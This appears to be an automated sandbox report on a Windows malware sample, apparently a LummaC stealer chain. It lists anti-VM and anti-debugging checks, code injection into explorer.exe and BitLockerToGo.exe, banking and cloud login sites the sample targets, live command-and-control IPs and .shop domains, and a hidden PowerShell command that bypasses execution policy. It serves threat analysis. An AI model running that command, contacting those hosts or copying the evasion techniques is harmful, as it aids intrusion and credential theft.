Code function: 8_2_00007FF7A09A7000 GetKeyboardLayoutList followed by cmp: cmp r8d, 00000419h and CTI: je 00007FF7A09A71AFh

8_2_00007FF7A09A7000

Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 597937
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 594906
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: explorer.exe, 00000002.00000000.2081714361.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0r
Source: explorer.exe, 00000002.00000000.2081714361.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2078086633.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: BitLockerToGo.exe, 0000000E.00000003.3002238333.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696428655p
Source: 7C81.exe.2.dr	Binary or memory string: runtime: sp=abi mismatchout of rangeCypro_MinoanMeetei_MayekPahawh_HmongSora_SompengSyloti_Nagrimultipathtcp127.0.0.1:53no such hostCIDR addressunknown portinvalid portgetaddrinfowtransmitfileGetConsoleCPnot pollableECDSA-SHA256ECDSA-SHA384ECDSA-SHA512SERIALNUMBERstringlengthContent-Typecontext.TODOtlsunsafeekmclose notifyremote errorc hs traffics hs trafficc ap traffics ap traffichttpmuxgo121PUSH_PROMISECONTINUATIONCookie.Valuecontent-typemax-forwardshttp2debug=1http2debug=2100-continueMulti-StatusNot ModifiedUnauthorizedI'm a teapotNot ExtendedproxyconnectMime-VersionX-ImforwardsX-Powered-Bybad Tc valuebad Th valuebad Tq valuebad Pq valuebad Td valuebad Ta valuedisplay-nameban-durationRemoveSignerGetDealLabelChangePeerIDTransferFromgotypesaliasRCodeSuccessRCodeRefusedinvalid baseInstAltMatchunexpected )altmatch -> anynotnl -> empty numberReadObjectCBdecode arraydecode sliceunknown type = struct { Content Type (sensitive)simple errordbl-sha2-256base32hexpadbase58flickrbase64urlpadbase256emojiavx5124fmapsavx512bitalgcaller errorPskModePlaineccsi_sha256PUNSUBSCRIBESUNSUBSCRIBE(database)s$Switch Proxy.fasthttp.gz.fasthttp.brAMDisbetter!AuthenticAMDCentaurHaulsGenuineIntelTransmetaCPUGenuineTMx86Geode by NSCVIA VIA VIA KVMKVMKVMKVMMicrosoft HvVMwareVMwareXenVMMXenVMMbhyve bhyve HygonGenuineVortex86 SoCSiS SiS SiS RiseRiseRiseGenuine RDCECH requiredbad KDF ID: BindCompleteFunctionCalluncompressedparsing time out of rangeDeleteServiceRegEnumKeyExWRegOpenKeyExWStartServiceWCertOpenStoreFindNextFileWFindResourceWGetDriveTypeWMapViewOfFileModule32NextWThread32FirstVirtualUnlockWaitCommEventWriteConsoleWRtlGetVersionRtlInitStringCoTaskMemFreeEnumProcessesShellExecuteWExitWindowsExGetClassNameWtimeEndPeriodFreeAddrInfoWgethostbynamegetservbynameWTSFreeMemoryFindFirstFileWSACloseEventgethostbyaddrgetservbyportWSAResetEventWSAIsBlockingSysFreeStringSafeArrayLockSafeArrayCopyVarI2FromDateVarI2FromDispVarI2FromBoolVarI4FromDateVarI4FromDispVarI4FromBoolVarR4FromDateVarR4FromDispVarR4FromBoolVarR8FromDateVarR8FromDispVarR8FromBoolVarDateFromI2VarDateFromI4VarDateFromR4VarDateFromR8VarDateFromCyVarCyFromDateVarCyFromDispVarCyFromBoolVarBstrFromI2VarBstrFromI4VarBstrFromR4VarBstrFromR8VarBstrFromCyVarBoolFromI2VarBoolFromI4VarBoolFromR4VarBoolFromR8VarBoolFromCyVarUI1FromStrCreateTypeLibClearCustDataLoadTypeLibExVarDecFromUI1VarDecFromStrVarDateFromI1VarBstrFromI1VarBoolFromI1VarUI1FromUI2VarUI1FromUI4VarUI1FromDecVarDecFromUI2VarDecFromUI4VarI1FromDateVarI1FromDispVarI1FromBoolVarUI2FromUI1VarUI2FromStrVarUI2FromUI4VarUI2FromDecVarUI4FromUI1VarUI4FromStrVarUI4FromUI2VarUI4FromDecBSTR_UserSizeBSTR_UserFreeVarI8FromDateVarI8FromDispVarI8FromBoolVarDateFromI8VarBstrFromI8VarBoolFromI8VarUI1FromUI8VarDecFromUI8VarUI2FromUI8VarUI4FromUI8VarUI8FromUI1VarUI8FromStrVarUI8FromUI2VarUI8FromUI4VarUI8FromDecOMAP From SrcInterfaceImplStandAloneSigAssemblyRefOSEFI byte codeMIPS with FPUEFI ROM imageAlign 2-BytesAlign 4-BytesAlign 8-Bytesby_start_timeDRAINING_SUBSDRAINING_PU
Source: explorer.exe, 00000002.00000000.2081714361.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3104687148.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3104687148.00000000007E3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000002.3107588566.00000000007E3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000002.3107588566.00000000007AB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: 7C81.exe, 0000000A.00000002.2957905311.0000022ADE938000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll99
Source: explorer.exe, 00000002.00000000.2081714361.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2081714361.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTcaVMWare
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: explorer.exe, 00000002.00000000.2081714361.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: BitLockerToGo.exe, 0000000E.00000003.3104687148.00000000007E3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000002.3107588566.00000000007E3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW;s
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2080080282.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
Source: BitLockerToGo.exe, 0000000E.00000003.3002238333.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: YNVMware
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: explorer.exe, 00000002.00000000.2079158771.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
Source: 7C81.exe	Binary or memory string: .brAMDisbetter!AuthenticAMDCentaurHaulsGenuineIntelTransmetaCPUGenuineTMx86Geode by NSCVIA VIA VIA KVMKVMKVMKVMMicrosoft HvVMwareVMwareXenVMMXenVMMbhyve bhyve HygonGenuineVortex86 SoCSiS SiS SiS RiseRiseRiseGenuine RDCECH requiredbad KDF ID: BindCompleteFunct
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: explorer.exe, 00000002.00000000.2081714361.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
Source: explorer.exe, 00000002.00000000.2081714361.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.2080080282.000000000769A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2080080282.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: explorer.exe, 00000002.00000000.2081714361.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.2079158771.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: 6E8A.exe, 0000000B.00000002.4487639564.0000021FA3037000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.4512237917.0000022A4D660000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2081714361.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: explorer.exe, 00000002.00000000.2079158771.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware-42 27 d9 2e dc 89 72 dX
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2079158771.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware,p
Source: explorer.exe, 00000002.00000000.2081714361.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0#{5-
Source: BitLockerToGo.exe, 0000000E.00000003.3003611405.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: explorer.exe, 00000002.00000000.2078086633.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\file.exe	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sashibt	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sashibt	System information queried: CodeIntegrityInformation	Jump to behavior

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\AppData\Local\Temp\6E8A.exe

Code function: 11_2_00007FF848F23329 CheckRemoteDebuggerPresent,

11_2_00007FF848F23329

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sashibt	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sashibt	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process queried: DebugPort

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 14_2_004F9D10 LdrInitializeThunk,

14_2_004F9D10

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0255092B mov eax, dword ptr fs:[00000030h]	0_2_0255092B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02550D90 mov eax, dword ptr fs:[00000030h]	0_2_02550D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02713E37 push dword ptr fs:[00000030h]	0_2_02713E37
Source: C:\Users\user\AppData\Roaming\sashibt	Code function: 4_2_025E092B mov eax, dword ptr fs:[00000030h]	4_2_025E092B
Source: C:\Users\user\AppData\Roaming\sashibt	Code function: 4_2_025E0D90 mov eax, dword ptr fs:[00000030h]	4_2_025E0D90
Source: C:\Users\user\AppData\Roaming\sashibt	Code function: 4_2_02643C47 push dword ptr fs:[00000030h]	4_2_02643C47
Source: C:\Users\user\AppData\Roaming\sashibt	Code function: 7_2_025E092B mov eax, dword ptr fs:[00000030h]	7_2_025E092B
Source: C:\Users\user\AppData\Roaming\sashibt	Code function: 7_2_025E0D90 mov eax, dword ptr fs:[00000030h]	7_2_025E0D90
Source: C:\Users\user\AppData\Roaming\sashibt	Code function: 7_2_02666DDF push dword ptr fs:[00000030h]	7_2_02666DDF

Source: C:\Users\user\AppData\Local\Temp\6E8A.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: 3530.exe.2.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 77.221.157.163 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 107.173.160.139 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 107.173.160.137 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 162.0.235.84 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 109.172.114.212 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 64.190.113.113 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 125.7.253.10 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 177.222.41.236 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 186.145.236.93 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 167.235.128.153 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.149.100.242 443	Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\3530.exe	Memory allocated: C:\Windows\explorer.exe base: 3000000 protect: page read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Memory allocated: C:\Windows\explorer.exe base: 3270000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Memory allocated: C:\Windows\explorer.exe base: 3290000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Memory allocated: C:\Windows\explorer.exe base: 8380000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7C81.exe	Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 4C0000 protect: page execute and read and write	Jump to behavior

Bypasses PowerShell execution policy

Source: C:\Users\user\AppData\Local\Temp\6E8A.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1"

Changes memory attributes in foreign processes to executable or writable

Source: C:\Users\user\AppData\Local\Temp\3530.exe

Memory protected: C:\Windows\explorer.exe base: 3000000 protect: page execute and read and write

Jump to behavior

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\file.exe	Thread created: C:\Windows\explorer.exe EIP: 30619D0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sashibt	Thread created: unknown EIP: 32019D0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sashibt	Thread created: unknown EIP: 88B19D0	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\7C81.exe

Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 4C0000 value starts with: 4D5A

Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Users\user\AppData\Local\Temp\3530.exe	Memory written: PID: 1028 base: 3000000 value: 20	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Memory written: PID: 1028 base: 3001000 value: 48	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Memory written: PID: 1028 base: 8380030 value: 00	Jump to behavior

LummaC encrypted strings found

Source: 7C81.exe, 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: indexterityszcoxp.shop
Source: 7C81.exe, 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: lariatedzugspd.shop
Source: 7C81.exe, 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: callosallsaospz.shop
Source: 7C81.exe, 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: outpointsozp.shop
Source: 7C81.exe, 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: liernessfornicsa.shop
Source: 7C81.exe, 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: upknittsoappz.shop
Source: 7C81.exe, 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: shepherdlyopzc.shop
Source: 7C81.exe, 0000000A.00000002.2956327407.000000C00065C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: unseaffarignsk.shop

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\file.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sashibt	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sashibt	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sashibt	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sashibt	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\3530.exe	Memory written: C:\Windows\explorer.exe base: 3000000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Memory written: C:\Windows\explorer.exe base: 3001000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3530.exe	Memory written: C:\Windows\explorer.exe base: 8380030	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7C81.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 4C0000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7C81.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 384008	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\7C81.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process created: C:\Users\user\AppData\Local\Temp\6E8A.exe "C:\Users\user\AppData\Local\Temp\6E8A.exe" -HOSTRUNAS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E8A.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1"	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\3530.exe

Code function: 8_2_00007FF7A0A0F310 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,CheckTokenMembership,

8_2_00007FF7A0A0F310

Source: explorer.exe, 00000002.00000000.2081714361.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd=
Source: explorer.exe, 00000002.00000000.2078759243.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000002.00000000.2079913510.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2078759243.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.2078759243.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.2078759243.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000002.00000000.2078086633.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PProgman

Source: C:\Users\user\AppData\Local\Temp\7C81.exe	Queries volume information: C:\Windows VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7C81.exe	Queries volume information: C:\Windows\AppReadiness VolumeInformation	Jump to behavior
